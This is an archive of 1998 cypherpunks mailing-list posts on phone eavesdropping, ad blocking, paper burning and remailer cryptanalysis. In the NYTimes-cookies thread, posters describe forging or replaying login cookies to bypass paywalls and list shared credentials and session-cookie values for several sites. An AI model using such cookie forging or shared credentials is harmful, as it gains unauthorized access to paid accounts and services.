Date: Mon, 26 Jan 1998 10:22:33 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Technolgies of Political Control (fwd)
Message-ID: <199801260213.UAA25274@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I would like to suggest that you reconfigure your editor so it actualy puts
in LF/CR's so that it doesn't show up as one long line...

Any editing errors are mine.

Forwarded message:

> Date: Sun, 25 Jan 1998 17:46:02 -0800
> From: Steve Schear <schear@lvdi.net>
> Subject: Re: Technolgies of Political Control

> At 6:47 PM -0500 1/25/98, John Young wrote:
> >Thanks to Axel Horns and Ulf Mller we offer an excerpt
> >of the draft European Parliament report on global
> >surveillance cited in news reports recently:
> >
> >  An Appraisal of Technolgies of Political Control
> >Scientific and Technological Options Assessment
> >     Working Document (Consultation version)
> >                  PE 166 499
> >            Luxembourg, 6 January 1998
> 
> The report makes mention of built-in surveillence feature in CCITT
 compliant ISDN products.  ""What is not widely known is that built in
 to the international CCITT protocol is the ability to take phones
 'off hook' and listen into conversations occurring near the phone,
 without the user being aware that it is happening."  Seems like an
 awful lot of CP using ISDN gear should beware.  Many ISDN devices are
 firmware based.  Might this not spawn a number of good crack projects
 to remove this feature from popular products.  I use an Ascend P25.
  The docs say its CCITT compliant.  Sooo does it enable this form of
 surveillence?  Enquiring minds want to know.
> 

All phones can be forced to do this. Even POTS. It's a commenly known
'feature' by most folks in the telecom industry for the last 30+ years.
Commen defeat is to leave the phones unplugged or place them next to a
radio or television. Then if you want to have a secure conversation
go to another room, or better yet take a long walk in your neighborhood
at low-traffic times.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Kelsey" <kelsey@plnet.net>
Date: Mon, 26 Jan 1998 10:21:35 +0800
To: "cypherpunks" <cypherpunks@Algebra.COM>
Subject: Re: Why no "Banner Ad Eaters"?
Message-ID: <199801260212.UAA29879@email.plnet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Date: 01/25/98 ##
  Subject: Re: Why no "Banner Ad Eaters"? ]

>Date: Thu, 22 Jan 1998 23:53:19 -0800
>From: Bill Stewart <bill.stewart@pobox.com>
>Subject: Re: Why no "Banner Ad Eaters"?

>At 11:16 PM 1/22/98 -0800, Wei Dai wrote:
>>It seems to me that blocking ads is no different from
>>blocking porn. All of the technology being developed for the
>>latter purpose (PICS for example) will eventually be used
>>for the former.

>With both PICS ratings for web pages and the new TV ratings,
>somehow the ratings only apply to the program and not the
>ads. After all, if each TV commercial had to be separately
>rated, people would rapidly develop equipment to autoblock
>commercials, and that just wouldn't do.

Note that there's a difference in incentives, here, too.
Porn sites in most countries, including the US, have some
strong legal and social incentives to rate themselves
honestly, and probably have relatively little financial
incentive to rate themselves inaccurately.  (Think of the
hassles you get with things like disputed credit card
payments made by someone's 14-year-old kid.)  This makes the
blocking software's job a lot easier.

I just can't see what incentive advertisers have to
co-operate with rating systems of this kind.  How would it
improve your bottom line?  Advertisers are likely to get
paid either on the basis of number of people who see the ad,
or on the basis of number of people who click on the ad.  In
either case, letting your ad be casually filtered out is
just not going to make you any money.  About the only
incentive I can see for letting your ads be blocked is the
desire not to make too many ad recipients mad at the
advertiser.  (Presumably, this is the reason why spam is
almost never used by reputable companies--they don't want to
make too many potential customers angry.)  But this doesn't
seem to apply to webpage ads, which manage not to be quite
intrusive enough to enrage their targets.

>Unfortunately, you're probably right, though providers and
>advertisers who really want their messages to get through
>will find ways to do it. The current banners are nice,
>friendly implementations in that they're easy to identify
>and block; newer ones will just be sneakier.

I assume that, sooner or later, the advertisements will be
woven in so well that it's all-but-impossible to get rid of
them without also getting rid of the useful content you're
trying to read/see/use.

[Good comments deleted.]

>Alternatively,
>they may go to clickthrough payment models - the web page
>owner only gets paid when people click on the ad, though
>perhaps at a higher rate than current "impressions".

Maybe.  Either way, in the long run, ads that don't seem to
be generating sales aren't going to be renewed.  Being able
to count clicks gives you one metric for this; another is
completed sales from those clicks.  This defines why web
page owners that are making lots of ad revenue will have
lots of incentive to make people who use their services look
at and respond to their ads.  People will try various things
to make this happen.  If none of them work, then ad-supported
pages will cease to exist.

Many of the services now supported by ads have other good
revenue models.  Sites like Dejanews and Altavista have
enough name-recognition to do things like sell custom
searching or research from their Usenet and Web databases,
or provide statistical customer profiles that don't reveal
customer identities but are still of use to marketers.

>Bill
>Bill Stewart, bill.stewart@pobox.com

Note:  I read CP-LITE instead of the whole list.  Please CC
       me on replies.

- --John Kelsey, kelsey@counterpane.com / kelsey@plnet.net
NEW PGP print =  5D91 6F57 2646 83F9 6D7F 9C87 886D 88AF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNMwNTiZv+/Ry/LrBAQH6KgP/c0o0ZiraSW7PbmDK6YQh+D3wp48cIn3S
manFeca05yuoJDvs6ZKO85ycvVTvVZXBP8tvVDDAMD35CEfxGMNc/0bk1hqS/rx9
/gkHy/OYeKvcSscP9KwWTRtGu+DhHxjNqxOuFFgw6QBCxA5KDdUakF64POlYbi/2
+/kMlWS3on0=
=QsU7
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Tue, 27 Jan 1998 01:26:08 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Technolgies of Political Control (fwd)
In-Reply-To: <199801260213.UAA25274@einstein.ssz.com>
Message-ID: <v03102801b0f1bcbe7943@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:13 PM -0600 1/25/98, Jim Choate wrote:
>Hi,
>
>I would like to suggest that you reconfigure your editor so it actualy puts
>in LF/CR's so that it doesn't show up as one long line...

Thanks, I recently reload my email client and it must have reset I fool the
parameters.  I don't notice this since Eudora wraps text by default.

>All phones can be forced to do this. Even POTS. It's a commenly known
>'feature' by most folks in the telecom industry for the last 30+ years.
>Commen defeat is to leave the phones unplugged or place them next to a
>radio or television.

I was aware of the POTS impedence trick, but the ISDN came as a shock.

--Steve







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 26 Jan 1998 04:08:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: NYTimes web cookies
In-Reply-To: <199801251852.NAA20393@myriad>
Message-ID: <199801252000.VAA04977@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



ghio@temp0199.myriad.ml.org (Matthew Ghio) wrote:

> It doesn't check the PW or ID at all except the first time you log in.
> After that it generates a new cookie titled NPLCNYT and that is the only
> cookie it checks; the PW and ID are not required to be there at all.
> If you delete the NPLCNYT cookie, it will check the PW/ID and generate
> a new one.  An example cookie is below:
> 
> NPLCNYT=AAAALw>AAAAAX9IUUWiPhfALqHZuSh2mUM0yzNOwGRReAAAAAsAAAAAY3lwaGVycHVua3M>

I put this wafer in my junkbuster-configfile and disabled all other cookies,
and NYTimes let me in without asking for a password, but after I read a few
articles, the site started behaving strangely, where the server would seem
to hang on certain pages, taking forever to send the html.

Interesting though.  Maybe we should hold a cypherpunks 'potluck' where
everyone trades cookies.  :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aptinfo@nyrealty.com (NY Realty.COM)
Date: Mon, 26 Jan 1998 10:18:22 +0800
To: cypherpunks@Algebra.COM
Subject: Your nyrealty.com preferences
Message-ID: <9801260215.AA18882@nyrealty.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you, Random Q. Hacker, for setting your preferences at nyrealty.com

Now, every time you return to www.nyrealty.com, the site will
be customized according to your preferences.  If you have any
questions regarding the operations of the site or if you need
assistance in finding an apartment in New York City, please
contact us at aptinfo@nyrealty.com


Sincerely,


Real Estate On-Line
http://www.nyrealty.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 26 Jan 1998 11:27:20 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Burning papers (fwd)
Message-ID: <199801260322.VAA25747@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Jan 1998 04:00:08 +0100 (MET)
> Subject: Re: Burning papers
> From: nobody@REPLAY.COM (Anonymous)

> I've heard that you can look at it under a microscope with a polarizing
> filter and see the magnetic patterns.

Go down to your local security or electronics supply (not Rat Shack) and
you should be able to buy a polarized loupe and see it directly.

> Plastic should burn fine, as most is polyethylene (CH2) which produces
> water and carbon dioxide when burned, leaving virtually no residue.  The
> only plastic that you'd need to worry about is chlorinated stuff like PVC.

If it has any N in it then don't burn it in a closed space otherwise you
will get various xCN compounds. These are very toxic, KCN is Potassium Cyanide.

In general you don't want to burn most plastics in closed spaces or be
downwind because they do give off various toxic chemicals. You can check
with your local fire dept. and they can provide references on the plastics
used in television cases, 3.5 floppy covers (v the disk itself), video tape,
etc. and the sorts of gases they give off.

When my house burned 3 years ago both my cats were killed because of smoke
inhalation (approx. 9 computers and bunches of other plastics went up). It
was not a pretty sight. Congealed blood from lung eruptions on their lips,
very blue tinge to the skin, etc. Not a pretty sight.

If you're smart avoid burning plastics except under very controlled
circumstances.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webboard@netstrike.com (Webboard Mail Handler)
Date: Mon, 26 Jan 1998 10:55:01 +0800
To: cypherpunks@Algebra.COM
Subject: Welcome to our WebBoard!
Message-ID: <19980126025531339.AAA359@max>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for participating in our conferencing system, Random Q..

Please save this message.  It contains important information,
such as your login name and password (see below).

Our web conferencing offers online Help for all major features.
If you have questions about a feature, look for the help button
on the menubar or post a message asking for help (Click "Post"
on the menubar).

You may also want to try features such as email notification,
spell checking, file attachments, and more.

Here is your login information.  Be sure to keep it somewhere safe!

Your Login Name: cypherpunks
Your Password: cypherpunks

You can change your password, email address, and other items
by clicking the "Profile" button on the menubar.

Please be sure to come back and visit us at:
http://max.netstrike.com:8080/~1

We hope you enjoy participating in our conferences!

Sincerely,
WebBoard Administrator





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Registration@Reba.com
Date: Mon, 26 Jan 1998 11:25:00 +0800
To: cypherpunks@Algebra.COM
Subject: Welcome to RebaNet
Message-ID: <19980125221210.7cf0008f.in@olsmx0.judds.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello, and welcome to RebaNet!  I hope you enjoy what we have put
together for you on my web site. We've tried to make it fun and
entertaining, as well as informative.

RebaNet is filled with extras such as: chat, message boards, Reba
Review, and you'll even have to opportunity to send me questions through
Ask Reba.

Isn't modern technology just amazing?  I still find it hard to believe
that I can write you a letter, hit send, and you have it waiting in your
e-mail box just minutes later! From time to time, I will send you email
messages.  This is a great way for me to keep in touch and let you know
what's going on with me.

Love,
Reba





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Mon, 26 Jan 1998 11:46:48 +0800
To: "Jim Gillogly" <cypherpunks@cyberpass.net>
Subject: Re: Tossing your cookies [Re: Why no "Banner Ad Eaters"?]
Message-ID: <199801260341.WAA02927@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 1/25/98 12:16 PM, Jim Gillogly (jim@acm.org)  passed this wisdom:

>Heinz-Juergen Keller skribis:
>> Just a silly? question on cookies:
>> What will happen if I just link cookies.txt to /dev/null ?
>> Is there anything speaking against this solution?
>
>Works fine on Unix and Linux systems if you're not a cookie fan:
>the remote sites think you've eaten their cookies, but you've
>merely frisbeed them into the bit bin.
>
>It's better than telling Netscape you want to be asked: some
>sites set a dozen cookies per hit, seems like, and saying "no"
>to each gets immediately tedious.  If you tell Netscape to reject
>them, some sites won't serve you the content.  Setting the browser
>to accept everything and linking cookies.txt to /dev/null works
>well for me.

 On a Mac you can erase the cookies file and then create a folder by the 
same name in its place ...


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "One of the deep mysteries to me is our logo, the symbol of lust
   and knowledge, bitten into, all crossed with in the colors of the
   rainbow in the wrong order. You couldn't dream of a more 
   appropriate logo: lust, knowledge, hope, and anarchy."
   -- Gassee - Apple Logo






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Mon, 26 Jan 1998 16:26:21 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Burning papers
In-Reply-To: <199801251819.MAA17338@manifold.algebra.com>
Message-ID: <19980126001920.08937@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Jan 25, 1998 at 11:56:20AM -0800, Bill Stewart wrote:
> At 12:19 PM 1/25/98 -0600, Igor Chudov @ home wrote:
> >Just for your information, I _WAS_ mistaken. The papers burned really
> >well. My confusion about burnability of papers arose because in the
> >past I tried to burn magazines, and not papers and letters. The whole
> >big box is gone, after two burns. Burning is unquestionably better than
> >shredding.
> 
> There are shredders, and then there are shredders.  The SOHO-sized
> shredders that just cut things into ribbons aren't very thorough
> (and it's been demonstrated that documents shredded that way can
> be reassembled by sufficiently large numbers of Iranian college students)
> but they're good prep for burning the papers.
> On the other hand, the cross-cut shredders that leave flakes no more
> than 1/8" rectangles or even smaller chad are good enough for
> classified documents.

Maybe some classified documents.  Certainly not for some others.  

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 26 Jan 1998 10:11:43 +0800
To: kelsey@plnet.net
Subject: future proofing algorihtms (Re: (eternity) Eternity as a secure filesystem/backup medium)
In-Reply-To: <199801221532.JAA28790@email.plnet.net>
Message-ID: <199801260118.BAA00753@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




John Kelsey <kelsey@plnet.net> writes on cpunks:
> >1. communications crypto used by the author in submitting
> >   the document is broken
> 
> This is only a threat if the authorities have a good idea
> who submitted the data, and want to prove it.  

If we assume that the document was submitted by mixmaster remailer,
and that there is another leap forward in factoring algorithms such
that 1024 bit isn't enough any more.  (Not like it hasn't happened
before cf Rivest & friend's original predictions of hardness of
RSA-129).

Now threat model is that NSA is archiving mail between mixmaster
nodes.  They observe which exit mail corresponds to the target
document.  They look at the set of mixmaster mails going into that
node which could plausibly have corresponded to that message as
determined by the pool size.

Repeat to get back to originator.  If we assume 100 message pool size
(probably generous) and chain of length 10, that is 1000 decryptions
which adds equivalent to 10 bits worth of symmetric key size.

Paranoid stuff yes, but the NSA mixmaster traffic archive doesn't seem
that unlikely.

It is interesting to note that Tim May's recent suggestion of LAM
(Local Area Mixes) would help here because if 5 of those mixmaster
nodes where part of a LAM, it is unlikely that the NSA would be able
to archive inter remailer traffic, thus increasing effective pool size
to 100^5.  So one advantage of the LAM approach is that it provides
links which are protected by physical security.

A user might like to amuse himself trying to use channels he suspects
will not be archived as the entry point.  Perhaps a disposable account
at a high volume free mail account like hot mail might be nice.  We
would like to push NSA's problem towards having to archive the entire
net traffic.

> >2. the eternity architecture contains encrypted documents to
> >   frustrate attempts to locate documents, and to hide the
> >   contents of documents from individual servers
> 
> Again, this won't be too economical unless the eternity
> service is rarely used.

The design criteria of efficiency and robustness are conflicting.  Our
problem is to design something with useful tradeoffs.  Probably a
system offering a range of trade offs so that low risk documents can
make use of more efficient but less secure services, etc.

> M XOR s_1(K1) XOR S_2(k2) XOR ... XOR s_5(k5).
> 
> leaves no way to recover M unless all five s_i() can be
> guessed.
> 
> Note that, in practice, this isn't likely to be useful
> unless you've done the same kind of thing for symmetric key
> distribution, random number generation, etc.  Otherwise,
> your attacker in 2050 will bypass the symmetric encryption
> entirely and factor your RSA modulus, or guess all the
> entropy sources used for your PRNG, or whatever else you can
> think of.

Yes.  We need to build constructs for all areas.  A mega hash would be
nice, with a large output size even in the face of birthday attack,
preferably as secure as a collection of hash functions.

That gives us something to wash our pseudo random number input entropy
with, and then we can go on to combine public key systems.

A problem with public key systems however is that there isn't a lot of
choice -- basically all based on discrete log or factoring.  So
perhaps RSA and DH combined in a construct with an optimistically
proportioned key size would be near all that could be done.

> The good news, though, is that active attacks (like chosen
> input attacks) and many side-channel attacks (e.g., timing
> attacks) turn out not to be possible if you are trying to
> mount them after the encryption has been carried out.

A variation of this is that if we can get widely deployed blanket
encryption (IPSEC), we have largely won because we can mix all sorts
of things below that envelope, and the NSA is reduced to archiving
some large proportion of network traffic.  Our task is then to design
protocols which aggresively rekey (earliest opportunity) and which
maximise the number of nodes which the NSA would need to archive
traffic between to recover traffic with future cryptanalysis.

I suspect archiving world Network traffic would pose something of a
operational and financial strain :-)

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 26 Jan 1998 15:48:22 +0800
To: cypherpunks@toad.com
Subject: Re: NYTimes web cookies
In-Reply-To: <v0310280ab0f19f4f8fdc@[208.129.55.202]>
Message-ID: <HoiwJe2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve Schear <schear@lvdi.net> writes:

> At 1:52 PM -0500 1/25/98, Matthew Ghio wrote:
> >> Cookies and the NYTIMES subscription: NYTIMES.COM tries to store your
> >> userid and password in the cookie with keywords PW= and ID=. Problem is,
> >> it tries to encode them using 8-bit characters. Lucky for us, at this time
> >> NYTIMES.COM does not check if userid/password are valid, just that they're
> >> a part of the cookie!! So, just add these two lines to your junkbuster
> >> config:
> >>
> >> wafer PW=0
> >> wafer ID=0
> >>
> >> and nytimes.com will greet you as "0" and let you right in.
> >
> >
> >It doesn't check the PW or ID at all except the first time you log in.
> >After that it generates a new cookie titled NPLCNYT and that is the only
> >cookie it checks; the PW and ID are not required to be there at all.
> >If you delete the NPLCNYT cookie, it will check the PW/ID and generate
> >a new one.  An example cookie is below:
> >
> >NPLCNYT=AAAALw>AAAAAX9IUUWiPhfALqHZuSh2mUM0yzNOwGRReAAAAAsAAAAAY3lwaGVycHVua
>
> Anyone have something similar for the WSJ?

www.wsj.com is a pay site ($49 | $29 / annum).
Someone (not me) might want to post the details
of their subscription so everyone else could use it;
I suspect that the folks running wsj.com might object.

I messed around some more with various sites that use cookies.

1. .CNN.com wants to set the following 4 cookies for "cypherpunks cypherpunks":

PNAA=:Ypgxlx L. Egdfbd'sZAQF0:
(i.e. Random Q. Hacker)
PNAB=:01884:
PNAC=:CVGTEOZRSBY:
CNN_CUSTOM=1 path=/customnews

Problem is, the last one needs the path and there'e no way to fake path
in junkbusters wafer.  I simply put cnn.com in the cookie file momentarily,
logged in to let it set the cookie, then changed it to ">cnn.com" to filter
out any updates to these 4 cookies.

2. www.economist.com has a freebie "cypherpunks cypherpunks" account. The
cookie is:

wafer econ-key=4GgOaV1a

Perhaps someone cares to set up a paid account for group use.

3. foxnews.com doesn't allow "cypherpunks" (too long); "cypherpunk" is
already taken, and I couldn't guess the password.  Would the entity
responsible please set the password to what we all expect it to be. :-)

4. avweb.com (aviation site) cypherpunks cypherpunks
wafer AVweb_Auth=Y3lwaGVycHVua3M6Y3lwaGVycHVua3M=

5. .reba.com (country music) cypherpunks cypherpunks
wafer RebaNet%5FPWD=cypherpunks
wafer RebaNet%5FUID=cypherpunks

6. http://www.netstrike.com:8080/ cypherpunks cypherpunks
wafer WB-User=cypherpunks
wafer WB-Pass=cypherpunks

7. .citywire.com aka .nyrealty.com - manhattan real estate
 Random Q. Hacker cypherpunks@algebra.com cypherpunks
wafer primary_nyrealtyid=Ra34cbf1b0a7d1c
wafer nyrealtyid=Ra34cbf1b0a7d1c

8. .netscape.com, .mcom.com
wafer NETSCAPE_ID=10010408,121ee744
wafer NSCP-US-DOWNLOAD=pkjbcTTL5OYAAAAAYRr3d8towI7Tj4v3nJwgig==

(Should somebody set up a cypherpunks microsoft login for downloading
all the patches and bug fixes they put out?)

Given the number of these things, it seems that sending them out with
every nntp request as a wafer wastes too much bandwidth.  Can someone
recommend a good program for editing the cookie file? I'm too lasy
to write it myself.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 26 Jan 1998 22:20:45 +0800
To: cypherpunks@toad.com
Subject: Re: More dumb ad sites for your killfile
In-Reply-To: <199801260247.DAA11848@basement.replay.com>
Message-ID: <kiJwJe3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



nobody@REPLAY.COM (Anonymous) writes:
> ads.lycos.com
> ad.doubleclick.net
> ads.altavista.digital.com
> ad.preferences.com
> ph-ad*.focalink.com
> www.news.com/Banners
> ads.lycos.com
> static.wired.com/advertising

A desirable feature for a proxy would be to filter portions of what it gets.
If we're getting a URL that matches a pattern (like www.stocks.hotshit.com),
then once we see a certain pattern in the HTML (start of embedded ad),
excise the HTML until we see another pattern.  A set of triples.

My block file so far is much bigger than yours.  Anyone cares to keep the
official big blocklist? :-)

**************************************************************************
victory.cnn.com/(image|click).ng/
/fox/graphics/yuppie.gif
ads.web.aol.com
/*/rsac.jpg
/gifs/ads/
webtrack.com
# look for guesttrack
/.*/rsacirated.gif
/shell-cgi/adserv/ads
/adserver/
/ad-graphics/
/cgi-win/tracker
/cgi-bin/Count
/cgi-bin/guesttrack
webcrawler.com/icons/(tenants.*|bottom_logo).gif
netads.*.com/
mckinley.com/img/magellan/butnbar.gif
#hotbot.com
hotbot.com/images/list.*.gif
#
banner-net.com/
/cgi-bin/nph-count
# yahoo
/us.yimg.com/images/compliance/
# Internet explorer logos
/.*/ie.*_(animated|static|sm).gif
/.*/netnow.*.gif
pagecount.com
gm.preferences.com
# da Silva's stupid list of mailing lists
/internet/paml/sponsors
/gifs/mlogo3.gif
#dejanews
/gifs/tripod.gif
/gifs/browsers.gif
/gifs/dnlogo_r.*.gif
# domains
smartclicks.com/
resource-marketing.com/
valueclick.com/
bannermall.com/
iname.com/
bannerweb.com/
eads.com/
/interdex/reciprocal/
/cgi-bin/spim/sp/
adforce..*.com/
/cgi-bin/adclick
imageserv.imgis.com/images/
/g/ads/
#
/graphics/ads/
/OAS/ugo/adstream.cgi/
/content/cgi-bin/clickad/
/content/advertising/
/.*/(S|s)ponsors/.*.gif
/cgi-bin/pn/show_ad
/gif/ads/
.*banner.*.gif
/ad/
/adgenius/
/adproof/
/(A|a)ds/
/adv/
/advertising/
/adverts/
/avimages/
/banner_ds/
/banners/
/banners?/
/CategoryID=0
/cgi-bin/ad-bin/
/cgi-bin/adroll/
/cgi-bin/counter*
/cgi-bin/nph-adlick
/event.ng/
/gfx/spon/
/gifs/netfinity.gif
/gifs/tripod2.gif
/graphics/pcast.gif
/graphicsadvert
/image/ads/
/images/ABCnewsa.gif
/images/ads/
/images/deckad1.gif
/images/getpoint1.gif
/images/nyyahoo.gif
/images/partners/
/images/promo/
/img/ads/
/img/art4/home/promo/
/inserts/images/
/ml/gfx/spon/
/pictures/sponsors/
/promobar
/promos/
/promotions/
/RealMedia/ads/
/shared/images/marketing/
/sponsor.*/.*.gif
209.25.19.47/
:23
ad.*.com/
adserve.*.com/
ad.*.net/
adcount.hollywood.com/
ads*.focalink.com/
ads.*.com/
bannersolutions.com/
bannerswap.com/
counter.digits.com/
digits.com/
doubleclick.com/
flycast.com/
freestats.com/
globaltrack.com/
globaltrack.net/
gp.dejanews.com/
guide.infoseek.com/
infoseek.com/images/channel/
hitbox.com/
hollynxxx.com/
icount.com/
jcount.com/
linkexchange.com/
register-it.com
riddler.com/
sexhound.com/
sexlist.com/
stattrax.com/
style.rahul.net/altavista/adverts/
# Geocities
www.geocities.com/cgi-bin/homestead/GeoGuideLite_image*
geocities.com/MemberBanners
xpagecount.com/
xxxcounter.com/
**************************************************************************
More stuff that I need to sort out:

adsmart.net
doubleclick.net
SmartBanner
imageserv.imgis.com/images
images.yahoo.com/adv
/ad_client.cgi

# ms sucks !
/*.*/(ms)?backoff(ice)?.*.(gif|jpe?g)
/*.*/(msie|sqlbans|powrbybo|activex|backoffice|explorer|netnow|getpoint|ntbutton|hmlink).*.(gif|jpe?g)
/*.*/activex.*(gif|jpe?g)
/*.*/explorer?.(gif|jpe?g)
/*.*/freeie.(gif|jpe?g)
/*.*/ie_?(buttonlogo|static?|anim.*)?.(gif|jpe?g)
/*.*/ie_sm.(gif|jpe?g)
/*.*/msie(30)?.(gif|jpe?g)
/*.*/msnlogo.(gif|jpe?g)
/*.*/office97_ad1.(gif|jpe?g)
/*.*/pbbobansm.(gif|jpe?g)
/*.*/powrbybo.(gif|jpe?g)
/*.*/sqlbans.(gif|jpe?g)

# generally useless information and promo stuff (commented out)
#/*.*/(counter|getpcbutton|BuiltByNOF|netscape|hotmail|vcr(rated)?|rsaci(rated)?|freeloader|cache_now(_anim)?|apache_pb|now_(anim_)?button|ie_?(buttonlogo|static?|.*ani.*)?).(gif|jpe?g)

#------------------------
#
# specific servers
#
#------------------------
193.158.37.3/cgi-bin/impact
193.210.156.114
194.231.79.38
199.78.52.10
204.253.46.71:1977
204.94.67.40/wc/
205.216.163.62
205.217.103.58:1977
205.217.103.58:1977
206.50.219.33
207.159.135.72
207.82.250.9
209.1.135.144:1971
209.1.135.142:1971
ad-up.com
ads?.*\.(com|net)
ad.adsmart.net
ad.doubleclick.net
ad.infoseek.com
ad.linkexchange.com
ad.preferences.com
adbot.com
adbot.theonion.com
adcount.hollywood.com
adforce.imgis.com
adlink.deh.de
adone.com
ads*.focalink.com
ads*.zdnet.com
ads.csi.emcweb.com
ads.imagine-inc.com
ads.imdb.com
ads.infospace.com
ads.lycos.com
ads.narrowline.com
ads.realmedia.com
ads.softbank.net/bin/wadredir
ads.usatoday.com
ads.washingtonpost.com
ads.web.aol.com
ads.web21.com
adservant.mediapoint.de
banners.internetextra.com
bannerswap.com
bs.gsanet.com/gsa_bs/
ciec.org/images/countdown.gif
click1.wisewire.com
click2.wisewire.com
clickii.imagine-inc.com:1964
commonwealth.riddler.com
customad.cnn.com
cyberfirst1.web.cerf.net/image.ng/
digits.com/wc/
dino.mainz.ibm.de
flycast.com/
globaltrack.com
globaltrak.net
gm.preferences.com/image.ng
gtp.dejanews.com/gtplacer
hardware.pagecount.com/
hitbox.com/wc/
hyperbanner.net
icount.com/.*.count
images.yahoo.com/promotions/
imageserv.imgis.com
impartner.de/cgi-bin
linktrader.com/cgi-bin/
logiclink.nl/cgi-bin/
movielink.com/media/imagelinks/MF.(ad|sponsor)
nrsite.com
nt1.imagine-inc.com
nt2.imagine-inc.com
nytsyn.com/gifs
pagecount.com/aa-cgi-bin
pagecount.com/aa-cgi-bin
ph-ad*.focalink.com
promo.ads.softbank.net
resource-marketing.com/tb/
smartclicks.com/.*/smartimg
smh.com.au/adproof/
sysdoc.pair.com/cgi-sys/cgiwrap/sysdoc/sponsor.gif
victory.cnn.com/image.ng/spacedesc
videoserver.kpix.com
w20.hitbox.com
www..bigyellow.com/......mat.*
www.ads.warnerbros.com
www.fxweb.holowww.com/.*.cgi
www.iadventure.com/adserver/
www.infoworld.com/pageone/gif
www.isys.net/customer/images
www.javaworld.com/javaworld/jw-ad
www.link4link.com/cgi-bin
www.mediashower.com/ad-bin/
www.nedstat.nl/cgi-bin/
www.nj.com/adverts
www.nrsite.com
www.pagecount.com/aa-cgi-bin
www.search.com/Banners
www.smartclicks.com:81
www.swwwap.com/cgi-bin/
www.valueclick.com/cgi-bin/
www.websitepromote.com/partner/img/
www.wishing.com/webaudit
yahoo.com/CategoryID=0

#------------------------
#
# some images on servers that I frequently visit
#
#------------------------

# some images on cnn's website just suck!
/*.*/book.search.gif
/*.*/cnnpostopinionhome..gif
/*.*/custom_feature.gif
/*.*/explore.anim.*gif
/*.*/infoseek.gif
/*.*/pathnet.warner.gif
/BarnesandNoble/images/bn.recommend.box.*
/digitaljam/images/digital_ban.gif
/hotstories/companies/images/companies_banner.gif
/markets/images/markets_banner.gif
/ows-img/bnoble.gif
/ows-img/nb_Infoseek.gif
cnnfn.com/images/left_banner.gif

# die sueddeutsche
/*.*/images/artszonnet.jpg

# yahoo.de
/promotions/bankgiro/

#
/gif/buttons/banner_.*
/gif/buttons/cd_shop_.*
/gif/cd_shop/cd_shop_ani_.*

#altavista
/av/gifs/av_map.gif
/av/gifs/av_logo.gif

/*.*/banner_ads/
/*.*/banners?/
/*.*/images/addver.gif
/*.*/place-ads
/*.*/promobar.*
